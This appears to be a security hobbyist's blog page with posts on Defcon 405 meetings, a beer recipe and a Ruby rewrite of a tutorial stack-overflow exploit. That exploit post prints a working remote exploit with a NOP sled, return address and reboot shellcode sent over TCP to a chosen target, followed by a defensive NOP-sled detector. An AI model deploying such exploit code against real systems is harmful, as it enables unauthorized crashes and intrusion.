July 23rd, 2008 Anthony Towry
This past Friday the Defcon 405 group held the July edition of the monthly meeting. This round featured 0hm as our headliner. He presented a riveting talk on "Hardening Windows Server: Building a House out of Greased BBs". I taped the presentation and as soon as I coordinate slides, will post the video.
I also handed out a few samples of the latest homebrew.

The Ingredients for DC405 Truth Serum:
- 7lbs DME
- 3lbs Coopers IPA LME
- 1lb Crystal Malt
- 1lb Liberty Malt
- 1oz Saaz
- 1oz Columbus
- White Labs Dry Ale Yeast
So far it's been a pretty tasty beverage. Not my typical hop bombs, but I guess I can get used to it. Look for it at Defcon! 0hm and I will be attempting to dish out some nasty at the 0wn the b0x/0wn the b0x contest, find us there.
Posted in Community | No Comments »
February 13th, 2008 Anthony Towry
This Friday we are getting back into the trenches at the DC405. We have a talk coming up on remote exploitation of stack-based overflows that will be presented by ri0t.
So, I've been checking out the write-up by Preddy regarding the service. It's a nice walk-through on exploiting an example vulnerable service using both C and Perl. This is informative; I had to adjust my payload size (no biggie) and add a #include <string.h>, but overall it's a solid example without errors.
Exploits written in C are fairly common. Exploits written in Perl aren't rare. Exploits written using Ruby are like unicorns... they probably exist, but you never see one (at least where I'm keeping up with them). At any rate, I decided to look into rewriting the example exploit in Ruby and scratching the surface of Ruby sockets. It turns out that this is an extremely simple thing to do.
#!/usr/bin/ruby
# http://www.calculateddecision.com
require 'socket'

port = 7500
victim = ARGV[0]
nop = "\x90"
sled = nop * 240
# This will probably be different for you
eip = "\xa8\xf9\xff\xbf"
# 20 byte reboot shellcode Linux x86 Thanks to izik <izik@tty64.org>
shellcode = "\x6a\x58" +
  "\x58" +
  "\xbb\xad\xde\xe1\xfe" +
  "\xb9\x69\x19\x12\x28" +
  "\xba\x67\x45\x23\x01" +
  "\xcd\x80"
# << appends in place, so payload is sled + shellcode + eip
payload = sled << shellcode << eip

if ARGV.length < 1 # Brief usage
  puts "You have to give me a target"
else
  mysocket = TCPSocket.new(victim, port)
  mysocket.send(payload, 0)
  mysocket.close
end
As you can see, the TCPSocket constructor only requires an endpoint and a port. What's nice is that you can actually hand it a domain name and it will resolve it. I half wondered if the hex bytes would need to be encoded or anything, but this is also handled for us without issue.
Looking at Preddy's Perl example, these two forms don't really differ all that much and in fact, I'm not entirely sure that there isn't a simpler socket constructor available in Perl (if nothing else on CPAN). Even so, Ruby does IMHO offer a more inviting grammar.
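The two properties noted above (TCPSocket takes a hostname and resolves it, and raw bytes go over the wire unencoded) are easy to check from the receiving side, which is also where a defender cares about them. The following is an added example, not code from the post or from Preddy's write-up: a TCPServer on loopback receives whatever a TCPSocket client sends, and a small detector flags the long run of 0x90 bytes that a NOP sled leaves in the stream, the same signature a network IDS matches on. The sample buffers are constructed for the demo, and the ephemeral port and "localhost" hostname are assumptions of the example.

```ruby
require 'socket'

# Length of the longest run of one byte value in a binary string. A long
# run of 0x90 (x86 NOP) is the classic sled signature an IDS looks for.
def longest_run(data, byte)
  best = 0
  run = 0
  data.each_byte do |b|
    if b == byte
      run += 1
      best = run if run > best
    else
      run = 0
    end
  end
  best
end

# True when the buffer contains a NOP run of at least `threshold` bytes.
# `.b` forces a binary view so the check is encoding-independent.
def nop_sled?(data, threshold: 32)
  longest_run(data.b, 0x90) >= threshold
end

# Round-trip a payload over loopback: TCPServer listens on an ephemeral
# port (0), the client connects by hostname so name resolution is
# exercised, sends the raw bytes, and the server returns what it read.
def loopback_roundtrip(payload, host: "localhost")
  server = TCPServer.new(host, 0)     # assumption: loopback is available
  port = server.addr[1]               # the port the kernel picked
  received = nil
  reader = Thread.new do
    conn = server.accept
    conn.binmode
    received = conn.read              # read until the client closes
    conn.close
  end
  client = TCPSocket.new(host, port)  # hostname, not an IP literal
  client.binmode
  client.send(payload.b, 0)           # bytes are sent as-is, no encoding
  client.close
  reader.join
  server.close
  received
end

# Constructed sample buffers (not captured traffic).
SAMPLE_SLED = ("\x90".b * 240) + "\xcd\x80".b   # 240 NOPs then int 0x80
SAMPLE_TEXT = "GET / HTTP/1.0\r\n\r\n".b          # ordinary request line

if __FILE__ == $PROGRAM_NAME
  begin
    back = loopback_roundtrip(SAMPLE_SLED)
    puts "bytes preserved over the socket: #{back == SAMPLE_SLED}"
    puts "sled detected in received data:  #{nop_sled?(back)}"
    puts "sled detected in plain request:  #{nop_sled?(SAMPLE_TEXT)}"
  rescue StandardError => e
    puts "loopback round-trip skipped: #{e.message}"
  end
end
```

The threshold of 32 is a starting point, not a tuned value: legitimate binary protocols can carry short runs of 0x90, so a production rule would pair the run length with the destination service and a check for executable bytes following the run.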
You can download my send_overflow.rb here.
Notes:
xWinGs wrote a local ENV variable example
Posted in Programming, Security | 2 Comments »
November 24th, 2007 Anthony Towry

The DC 405 meeting for November covered the ins and outs of wireless security. n0mad presented some interesting things involving high-end countermeasures and solutions to common wireless deployment problems. Check it out online at blip.tv.
Posted in Community, Security | No Comments »